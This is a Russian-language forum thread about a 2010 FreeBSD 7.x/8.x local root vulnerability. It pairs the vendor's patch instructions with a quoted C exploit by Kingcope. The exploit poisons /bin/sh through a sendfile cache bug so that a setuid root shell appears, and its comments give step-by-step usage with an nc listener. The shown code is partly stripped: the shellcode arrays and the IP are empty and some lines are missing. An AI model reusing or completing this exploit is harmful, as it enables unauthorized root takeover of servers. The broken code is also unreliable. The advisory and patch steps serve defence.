FreeBSD 8.*, 7.* Local ‘root’ Exploit

Обсуждение всяких разных новостей.
Аватара пользователя
Сообщения: 3388
Зарегистрирован: 2008-04-13 1:50:04
Откуда: %&й
Контактная информация:

FreeBSD 8.*, 7.* Local ‘root’ Exploit

Непрочитанное сообщение ProFTP » 2010-08-26 18:16:37

вродебы уязвимость...

особенно для тех кто предоставляет ssh ... t-exploit/


Код: Выделить всё

1) Upgrade your vulnerable system to 7-STABLE or 8-STABLE, or to the
RELENG_8_1, RELENG_8_0, RELENG_7_3, or RELENG_7_1 security branch dated
after the correction date.
2) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to FreeBSD 7.1, 7.3,
8.0 and 8.1 systems.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
# fetch
# fetch
b) Apply the patch.
# cd /usr/src
# patch < /path/to/patch
c) Recompile your kernel as described in
<URL:> and reboot the
3) To update your vulnerable system via a binary patch:
Systems running 7.1-RELEASE, 7.3-RELEASE, or 8.0-RELEASE on the i386 or
amd64 platforms can be updated via the freebsd-update(8) utility:
# freebsd-update fetch
# freebsd-update install

View Code C/*

Код: Выделить всё

 freebsd mbufs() sendfile cache poisoning-priv escalation 
 x86/x64 local root xpl v2 by Kingcope
 tested on: 8.1-RC1, 8.0-RELEASE, 7.3-RELEASE and
 7.2-RELEASE-p8 (xd personally did 7.2 test)
 poisons /bin/sh to contain shellcode which does this...
 chmod a+s /tmp/sh
 chown root /tmp/sh
 execve /tmp/sh2
 how to use ths is VERY important it is NOT your standard type,
 DONT start a listener as normal...let this do its shit..
 and then again, there is a MUCH simpler way you could redo
 this exploit but, thats for you to find ;) -xd
 box 1 (TARGET):
 $ cp /bin/sh /tmp/sh
 $ cp /bin/sh /tmp/sh2
 $ gcc cache.c -o cache
 box 2 (LISTENER):
 $ nc -l 7030
 on box 1 do:
 for i386 type:
 $ ./cache 1
 for amd64 type:
 $ ./cache 2
 ok now lets hope this worked and injected the shellcode,should,
 /bin/sh should be execed by the system as root in ~5 mins if lucky :)
 $ /tmp/sh
AND cleanup:
 # cp -f /tmp/sh2 /bin/sh
 enjoy the root shell!
// this juarez is now private on #darknet
#include <sys/types.h> 
#include <sys/socket.h>
#include <sys/uio.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <sys/select.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h> 
#include <string.h>
#include <err.h>
main (int argc, char *argv[]) {
  int s, f, k2;
  struct sockaddr_in addr;
  int flags;
  char str32[]=
  char str64[]=
  char buf[10000];
  char *p;
  struct stat sb;
  int n;
  fd_set wset;   
  int64_t size;  
  off_t sbytes;  
  off_t sent = 0;
  int chunk;   
  int arch = 3;
  if (argc != 2) {
    printf("[+] Define architecture i386 or amd64 (1/2)\n");
  if (strcmp(argv[1], "1") == 0)
  if (strcmp(argv[1], "2") == 0)
  if (arch == 3) {
    printf("[+] Define architecture i386 or amd64 (1/2)\n");
  s = socket(AF_INET, SOCK_STREAM, 0);
  bzero(&addr, sizeof(addr));
  addr.sin_family = AF_INET;  
  addr.sin_port = htons(7030);
  addr.sin_addr.s_addr = inet_addr("");
  n = connect(s, (struct sockaddr *)&addr, sizeof (addr));
  if (n < 0)
  warn ("[-] Failed to connect");
  f = open("/bin/sh", O_RDONLY);
  if (f<0)
  warn("[-] Failed to open file");
  n = fstat(f, &sb);
  if (n<0)
  warn("[-] fstat failed");
  size = sb.st_size;
  chunk = 0;
  flags = fcntl(f, F_GETFL);
  flags |= O_NONBLOCK;
  fcntl(f, F_SETFL, flags);
  while (size > 0) {
    FD_SET(s, &wset);
    n = select(f+1, NULL, &wset, NULL, NULL);
    if (n < 0)
      if (chunk > 0) {
      sbytes = 0;   
      if (arch == 1)
      n = sendfile(f, s, 2048*2, chunk, NULL, &sbytes,0);
      if (arch == 2)
      n = sendfile(f, s, 1204*6, chunk, NULL, &sbytes,0);
      if (n < 0)
      chunk -= sbytes;
      size -= sbytes; 
      sent += sbytes; 
    chunk = 2048;
    memset(buf, '\0', sizeof buf);
    if (arch == 1) {
      for (k2=0;k2<256;k2++) {
        buf[k2] = 0x90;
      p = buf;
      p = p + k2;
      memcpy(p, str32, sizeof str32);
      n = k2 + sizeof str32;
      p = buf;
    if (arch == 2) {
      for (k2=0;k2<100;k2++) {
        buf[k2] = 0x90;
      p = buf;
      p = p + k2;
      memcpy(p, str64, sizeof str64);
      n = k2 + sizeof str64;
      p = buf;
    write(s, p, n);
Pеrl FAQ
perl -e 'print join"",map $$_[rand@$_],([0..9,'a'..'z','A'..'Z'])x30'

Хостинговая компания

Услуги хостинговой компании


Тарифы на хостинг в России, от 12 рублей:
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.:
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
Недорогие домены в популярных зонах:

Аватара пользователя
ст. лейтенант
Сообщения: 1154
Зарегистрирован: 2008-07-24 0:25:31
Откуда: Ukraine, Donetsk

Re: FreeBSD 8.*, 7.* Local ‘root’ Exploit

Непрочитанное сообщение fox » 2010-08-28 1:48:05

Спасибо товарищь! За напоминания, а то дырку в жопе лишнюю можно нажить забыв security лист вовремя посетить...
Да пребудет с нами сила!!!
Всех убью, один останусь!